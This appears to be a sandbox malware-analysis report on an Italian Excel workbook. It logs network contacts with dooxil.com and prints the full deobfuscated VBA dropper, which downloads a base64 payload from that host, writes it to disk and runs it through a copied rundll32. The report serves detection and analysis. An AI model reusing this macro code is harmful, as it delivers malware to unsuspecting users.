General
Stream Path:_VBA_PROJECT_CUR/PROJECTwm
File Type:data
Stream Size:104
Entropy:3.331334921988963
Base64 Encoded:False
Data ASCII:Q u e s t a _ c a r t e l l a _ d i _ l a v o r o . Q . u . e . s . t . a . _ . c . a . r . t . e . l . l . a . _ . d . i . _ . l . a . v . o . r . o . . . F o g l i o 1 . F . o . g . l . i . o . 1 . . . . .
Data Raw:51 75 65 73 74 61 5f 63 61 72 74 65 6c 6c 61 5f 64 69 5f 6c 61 76 6f 72 6f 00 51 00 75 00 65 00 73 00 74 00 61 00 5f 00 63 00 61 00 72 00 74 00 65 00 6c 00 6c 00 61 00 5f 00 64 00 69 00 5f 00 6c 00 61 00 76 00 6f 00 72 00 6f 00 00 00 46 6f 67 6c 69 6f 31 00 46 00 6f 00 67 00 6c 00 69 00 6f 00 31 00 00 00 00 00
General
Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
File Type:data
Stream Size:3570
Entropy:4.762300417602462
Base64 Encoded:False
Data ASCII:a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D .
Data Raw:cc 61 b2 00 00 03 00 ff 00 20 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
General
Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_0
File Type:data
Stream Size:4673
Entropy:3.4972369321145735
Base64 Encoded:False
Data ASCII:K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . .
Data Raw:93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 02 00 01 00 00 00 00 00 01 00 00 00 01 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 c0 03 00 00 00 00 00 00 80 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00
General
Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_1
File Type:data
Stream Size:452
Entropy:2.541028075676919
Base64 Encoded:False
Data ASCII:r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ v . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . t r a g u a r d o . . . . . . . . . . . . . . . . p i t t o r e . . . . . . . . .
Data Raw:72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 02 00 00 00 00 00 00 7e 02 00 00 00 00 00 00 7e 76 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 11 00 00 00 00 00 00 00 00 00 05 00 11 00 00 00 00 00
General
Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_2
File Type:data
Stream Size:828
Entropy:2.4574353505314255
Base64 Encoded:False
Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . P . . . . . . . . . . . . . . . ` . . . . . . . 1 . . . . . . . . . . . . . . . . . O . . . . P . . . . . . . . . . . . . . . . ` . . . . . . . a . . . . . . . . . . . . . . . . . . . P . @ . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . O . P . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . O . O . X . . . . . . . . . .
Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 78 00 00 00 08 00 50 00 e1 01 00 00 00 00 00 00 00 00 03 00 00 00 03 60 08 01 e9 04 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
General
Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_3
File Type:data
Stream Size:6472
Entropy:3.743290714587534
Base64 Encoded:False
Data ASCII:r U . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . A . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . 4 . . . . . . . . . . ! . . . . . . . . . . . a . . . . . . . . . . . ! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:72 55 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 d0 04 00 00 00 00 00 00 00 00 00 00 0a 00 00 00 30 00 00 00 41 0c 00 00 00 00 00 00 00 00 00 00 c1 0d 00 00 00 00 00 00 00 00 00 00 41 0f 00 00 00 00 00 00 00 00
General
Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_4
File Type:data
Stream Size:680
Entropy:1.3016690799486477
Base64 Encoded:False
Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . . . . . . . . . . 7 . ` . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D . . . . . . . . . . . . . . .
Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 05 00 b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 00 00 01 00 d1 03 00 00 00 00 00 00 00 00 00 00 11 08 00 00 00 00 00 00 00 00 00 00 41 08
General
Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_5
File Type:data
Stream Size:106
Entropy:1.3591119461716878
Base64 Encoded:False
Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . b . . . . . . . . . . . . . . .
Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 04 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 78 00 00 00 08 00 00 00 00 00 00 00 62 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00
General
Stream Path:_VBA_PROJECT_CUR/VBA/dir
File Type:data
Stream Size:558
Entropy:6.191417516649333
Base64 Encoded:True
Data ASCII:. * . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . c e . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2 E
Data Raw:01 2a b2 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 8b f1 63 65 04 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
TimestampSource PortDest PortSource IPDest IP
Nov 3, 2022 12:32:40.884675980 CET49171443192.168.2.2291.213.50.111
Nov 3, 2022 12:32:40.884742975 CET4434917191.213.50.111192.168.2.22
Nov 3, 2022 12:32:40.884826899 CET49171443192.168.2.2291.213.50.111
Nov 3, 2022 12:32:40.912339926 CET49171443192.168.2.2291.213.50.111
Nov 3, 2022 12:32:40.912385941 CET4434917191.213.50.111192.168.2.22
Nov 3, 2022 12:34:50.971307993 CET4434917191.213.50.111192.168.2.22
Nov 3, 2022 12:34:50.974256039 CET49172443192.168.2.2291.213.50.111
Nov 3, 2022 12:34:50.974338055 CET4434917291.213.50.111192.168.2.22
Nov 3, 2022 12:34:50.974924088 CET49172443192.168.2.2291.213.50.111
Nov 3, 2022 12:34:50.975229025 CET49172443192.168.2.2291.213.50.111
Nov 3, 2022 12:34:50.975250959 CET4434917291.213.50.111192.168.2.22
Nov 3, 2022 12:37:02.043514013 CET4434917291.213.50.111192.168.2.22
Nov 3, 2022 12:37:02.044492006 CET49173443192.168.2.2291.213.50.111
Nov 3, 2022 12:37:02.044568062 CET4434917391.213.50.111192.168.2.22
Nov 3, 2022 12:37:02.044651031 CET49173443192.168.2.2291.213.50.111
Nov 3, 2022 12:37:02.044698000 CET49173443192.168.2.2291.213.50.111
Nov 3, 2022 12:37:02.044794083 CET4434917391.213.50.111192.168.2.22
Nov 3, 2022 12:37:02.044852972 CET49173443192.168.2.2291.213.50.111
Nov 3, 2022 12:37:02.378264904 CET49174443192.168.2.2291.213.50.111
Nov 3, 2022 12:37:02.378333092 CET4434917491.213.50.111192.168.2.22
Nov 3, 2022 12:37:02.378513098 CET49174443192.168.2.2291.213.50.111
Nov 3, 2022 12:37:02.379266977 CET49174443192.168.2.2291.213.50.111
Nov 3, 2022 12:37:02.379312992 CET4434917491.213.50.111192.168.2.22
Nov 3, 2022 12:39:13.115252018 CET4434917491.213.50.111192.168.2.22
Nov 3, 2022 12:39:13.116537094 CET49175443192.168.2.2291.213.50.111
Nov 3, 2022 12:39:13.116615057 CET4434917591.213.50.111192.168.2.22
Nov 3, 2022 12:39:13.116713047 CET49175443192.168.2.2291.213.50.111
Nov 3, 2022 12:39:13.116962910 CET49175443192.168.2.2291.213.50.111
Nov 3, 2022 12:39:13.116987944 CET4434917591.213.50.111192.168.2.22
Nov 3, 2022 12:41:24.187252045 CET4434917591.213.50.111192.168.2.22
Nov 3, 2022 12:41:24.188751936 CET49176443192.168.2.2291.213.50.111
Nov 3, 2022 12:41:24.188801050 CET4434917691.213.50.111192.168.2.22
Nov 3, 2022 12:41:24.188867092 CET49176443192.168.2.2291.213.50.111
Nov 3, 2022 12:41:24.188935041 CET49176443192.168.2.2291.213.50.111
Nov 3, 2022 12:41:24.189090014 CET4434917691.213.50.111192.168.2.22
Nov 3, 2022 12:41:24.189147949 CET49176443192.168.2.2291.213.50.111
TimestampSource PortDest PortSource IPDest IP
Nov 3, 2022 12:32:40.726948023 CET5586853192.168.2.228.8.8.8
Nov 3, 2022 12:32:40.866636038 CET53558688.8.8.8192.168.2.22
TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
Nov 3, 2022 12:32:40.726948023 CET192.168.2.228.8.8.80x295cStandard query (0)dooxil.comA (IP address)IN (0x0001)false
TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
Nov 3, 2022 12:32:40.866636038 CET8.8.8.8192.168.2.220x295cNo error (0)dooxil.com91.213.50.111A (IP address)IN (0x0001)false

Click to jump to process

Click to jump to process

Click to dive into process behavior distribution

Target ID:0
Start time:12:32:16
Start date:03/11/2022
Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):false
Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Imagebase:0x13fc80000
File size:28253536 bytes
MD5 hash:D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Call Graph

  • Entrypoint
  • Decryption Function
  • Executed
  • Not Executed
  • Show Help
callgraph 9 aspetteremo FreeFile:1 45 stupidaggine Replace:1,responseText:1,CreateObject:1,send:1,Open:1, RTrim:1 212 ammiratrice LCase:1,Len:1,UCase:1,Mid:1,UBound:1 45->212 x 2 99 lasciatela Application:1 104 dimostrargli Print:1,Shell:1,Left:1,Environ:1 104->9 104->99 189 trattasse FreeFile:1 104->189 x 2 104->212 x 4 292 new_espandere 292->104 299 neurologo Rnd:1,Int:1 292->299 299->99 299->189 299->212 339 Presentava 299->339 355 rientrando 299->355 339->45 355->212 x 2

Module: Foglio1

Declaration
LineContent
1

Attribute VB_Name = "Foglio1"

2

Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

3

Attribute VB_GlobalNameSpace = False

4

Attribute VB_Creatable = False

5

Attribute VB_PredeclaredId = True

6

Attribute VB_Exposed = True

7

Attribute VB_TemplateDerived = False

8

Attribute VB_Customizable = True

APIsMeta Information

CreateObject

CreateObject("MSXML2.XMLHTTP")

Part of subcall function ammiratrice@Foglio1: Len

Part of subcall function ammiratrice@Foglio1: UBound

Part of subcall function ammiratrice@Foglio1: Mid

Part of subcall function ammiratrice@Foglio1: LCase

Part of subcall function ammiratrice@Foglio1: IsNumeric

Part of subcall function ammiratrice@Foglio1: UCase

Open

IXMLHTTPRequest.Open("GET","https://dooxil.com",False)

Part of subcall function ammiratrice@Foglio1: Len

Part of subcall function ammiratrice@Foglio1: UBound

Part of subcall function ammiratrice@Foglio1: Mid

Part of subcall function ammiratrice@Foglio1: LCase

Part of subcall function ammiratrice@Foglio1: IsNumeric

Part of subcall function ammiratrice@Foglio1: UCase

send

Replace

RTrim

responseText

StringsDecrypted Strings
"fgyMSXgjkML2u.XjnbvMLHyuigTTllcPfds"
"MSXML2.XMLHTTP"
"vbGtcrEkbvT"
"GET"
" "
"AA"
LineInstructionMeta Information
19

Function stupidaggine(ByVal pittore as String) as String

20

Dim attratto as Object

executed
21

Set attratto = CreateObject(ammiratrice("fgyMSXgjkML2u.XjnbvMLHyuigTTllcPfds", 6))

CreateObject("MSXML2.XMLHTTP")

executed
22

attratto.Open ammiratrice("vbGtcrEkbvT", 6), pittore, False

IXMLHTTPRequest.Open("GET","https://dooxil.com",False)

executed
23

attratto.send

send

24

stupidaggine = Replace(RTrim(attratto.responseText), " ", "AA")

Replace

RTrim

responseText

25

Set attratto = Nothing

26

End Function

APIsMeta Information

Part of subcall function lasciatela@Foglio1: DefaultFilePath

Part of subcall function lasciatela@Foglio1: Application

Int

Rnd

Part of subcall function trattasse@Foglio1: FreeFile

Part of subcall function trattasse@Foglio1: Open

Part of subcall function ammiratrice@Foglio1: Len

Part of subcall function ammiratrice@Foglio1: UBound

Part of subcall function ammiratrice@Foglio1: Mid

Part of subcall function ammiratrice@Foglio1: LCase

Part of subcall function ammiratrice@Foglio1: IsNumeric

Part of subcall function ammiratrice@Foglio1: UCase

StringsDecrypted Strings
"N5h13tDtKQpLL21sE0O:XM1/A40/R1d901oo24xIilR1.23cPRoC5m8"
"https://dooxil.com"
LineInstructionMeta Information
64

Function neurologo() as String

65

valletto = lasciatela & "\" & Int(89573453 * Rnd) + 6880 & "."

Int

Rnd

executed
66

trattasse rientrando((Presentava(ammiratrice("N5h13tDtKQpLL21sE0O:XM1/A40/R1d901oo24xIilR1.23cPRoC5m8", 3)))), valletto

executed
67

neurologo = valletto

68

End Function

APIsMeta Information

Len

Len("N5h13tDtKQpLL21sE0O:XM1/A40/R1d901oo24xIilR1.23cPRoC5m8") -> 55 Len("fgyMSXgjkML2u.XjnbvMLHyuigTTllcPfds") -> 35 Len("vbGtcrEkbvT") -> 11

UBound

Mid

LCase

IsNumeric

UCase

LineInstructionMeta Information
45

Function ammiratrice(stabilizzare, d) as String

46

Dim perseveranza()

executed
47

Redim perseveranza(Len(stabilizzare))

Len("N5h13tDtKQpLL21sE0O:XM1/A40/R1d901oo24xIilR1.23cPRoC5m8") -> 55

executed
48

For manna = 1 To UBound(perseveranza)

UBound

49

perseveranza(manna) = Mid(stabilizzare, manna, 1)

Mid

50

Next

UBound

51

For Each litigata in perseveranza

52

If d < 5 And litigata = LCase(litigata) And Not IsNumeric(litigata) Then

LCase

IsNumeric

53

morivano = morivano & litigata

54

Else

55

If d > 5 And litigata = UCase(litigata) Then

UCase

55

morivano = morivano & litigata

55

Endif

56

Endif

57

Next

58

ammiratrice = morivano

59

End Function

APIsMeta Information

Part of subcall function stupidaggine@Foglio1: CreateObject

Part of subcall function stupidaggine@Foglio1: Open

Part of subcall function stupidaggine@Foglio1: send

Part of subcall function stupidaggine@Foglio1: Replace

Part of subcall function stupidaggine@Foglio1: RTrim

Part of subcall function stupidaggine@Foglio1: responseText

LineInstructionMeta Information
69

Function Presentava(ByVal dimagrire as String) as String

70

Dim Wdimagrire as String

executed
71

Wdimagrire = dimagrire

72

Presentava = stupidaggine(Wdimagrire)

73

End Function

APIsMeta Information

Part of subcall function dimostrargli@Foglio1: Left

Part of subcall function dimostrargli@Foglio1: Environ

Part of subcall function dimostrargli@Foglio1: Print

Part of subcall function dimostrargli@Foglio1: Shell

Part of subcall function neurologo@Foglio1: Int

Part of subcall function neurologo@Foglio1: Rnd

LineInstructionMeta Information
60

Sub new_espandere()

61

scomparendo = dimostrargli(neurologo)

executed
62

End Sub

APIsMeta Information

DefaultFilePath

Application

LineInstructionMeta Information
27

Function lasciatela()

28

lasciatela = Application.DefaultFilePath

DefaultFilePath

Application

executed
29

End Function

APIsMeta Information

Part of subcall function aspetteremo@Foglio1: FreeFile

Part of subcall function aspetteremo@Foglio1: Open

Part of subcall function aspetteremo@Foglio1: LOF

Left

Environ

Part of subcall function ammiratrice@Foglio1: Len

Part of subcall function ammiratrice@Foglio1: UBound

Part of subcall function ammiratrice@Foglio1: Mid

Part of subcall function ammiratrice@Foglio1: LCase

Part of subcall function ammiratrice@Foglio1: IsNumeric

Part of subcall function ammiratrice@Foglio1: UCase

Part of subcall function lasciatela@Foglio1: DefaultFilePath

Part of subcall function lasciatela@Foglio1: Application

Part of subcall function ammiratrice@Foglio1: Len

Part of subcall function ammiratrice@Foglio1: UBound

Part of subcall function ammiratrice@Foglio1: Mid

Part of subcall function ammiratrice@Foglio1: LCase

Part of subcall function ammiratrice@Foglio1: IsNumeric

Part of subcall function ammiratrice@Foglio1: UCase

Print

Part of subcall function trattasse@Foglio1: FreeFile

Part of subcall function trattasse@Foglio1: Open

Part of subcall function trattasse@Foglio1: FreeFile

Part of subcall function trattasse@Foglio1: Open

Shell

StringsDecrypted Strings
"A7Uc6oP5mAs31p0Ee0c1"
LineInstructionMeta Information
30

Function dimostrargli(celebrita)

31

Dim scoperte() as Byte

32

scoperte = aspetteremo(Left(Environ(ammiratrice("A7Uc6oP5mAs31p0Ee0c1", 3)), 20) & ammiratrice("S5r1Yu3n11dIIl7lM87", 1) & "32" & ammiratrice("K60.3EHeNN7x56eO", 4))

Left

Environ

33

frequenta = lasciatela & ammiratrice("O0I01\1VcNBaJ8l0c500.2CCeYxZ190Ke88", 1)

34

Debug.Print trattasse(scoperte, frequenta)

Print

35

riporti = frequenta & " " & celebrita & ",#" & 1 & " /q"

36

riporti = trattasse(scoperte, Shell(riporti))

Shell

37

End Function

APIsMeta Information

Part of subcall function ammiratrice@Foglio1: Len

Part of subcall function ammiratrice@Foglio1: UBound

Part of subcall function ammiratrice@Foglio1: Mid

Part of subcall function ammiratrice@Foglio1: LCase

Part of subcall function ammiratrice@Foglio1: IsNumeric

Part of subcall function ammiratrice@Foglio1: UCase

StringsDecrypted Strings
"AbVK5in4W.b1QasY7e"
LineInstructionMeta Information
74

Public Function rientrando(ByVal baciarlo as String) as Byte()

75

With CreateObject(ammiratrice("9800m4WsYYxA8m66l", 2) & 2 & ammiratrice("74327.Ad700o67mAEdoKcu3Om55eKn55t", 4)).createElement(ammiratrice("3WEb0", 3) & 64)

76

. DataType = ammiratrice("AbVK5in4W.b1QasY7e", 3) & 64

77

c = 78

78

. Text = baciarlo

79

foh = 9

80

rientrando = . nodeTypedValue

81

End With

82

End Function

APIsMeta Information

FreeFile

Open

LOF

LineInstructionMeta Information
9

Function aspetteremo(traguardo) as Byte()

10

Dim dorsale() as Byte

11

Dim sparagli as Integer

12

sparagli = FreeFile

FreeFile

13

Open traguardo For Binary Access Read As sparagli

Open

14

Redim dorsale(0 To LOF(sparagli) - 1)

LOF

15

Get sparagli, , dorsale

16

Close sparagli

17

aspetteremo = dorsale

18

End Function

APIsMeta Information

FreeFile

Open

LineInstructionMeta Information
38

Public Function trattasse(benefici() as Byte, ByVal impiego as String)

39

Dim improvvisa as Long

39

improvvisa = FreeFile

FreeFile

40

Open impiego For Binary Access Write As improvvisa

Open

41

Put improvvisa, 1, benefici

42

Close improvvisa

43

End Function

Module: Questa_cartella_di_lavoro

Declaration
LineContent
1

Attribute VB_Name = "Questa_cartella_di_lavoro"

2

Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

3

Attribute VB_GlobalNameSpace = False

4

Attribute VB_Creatable = False

5

Attribute VB_PredeclaredId = True

6

Attribute VB_Exposed = True

7

Attribute VB_TemplateDerived = False

8

Attribute VB_Customizable = True

Reset < >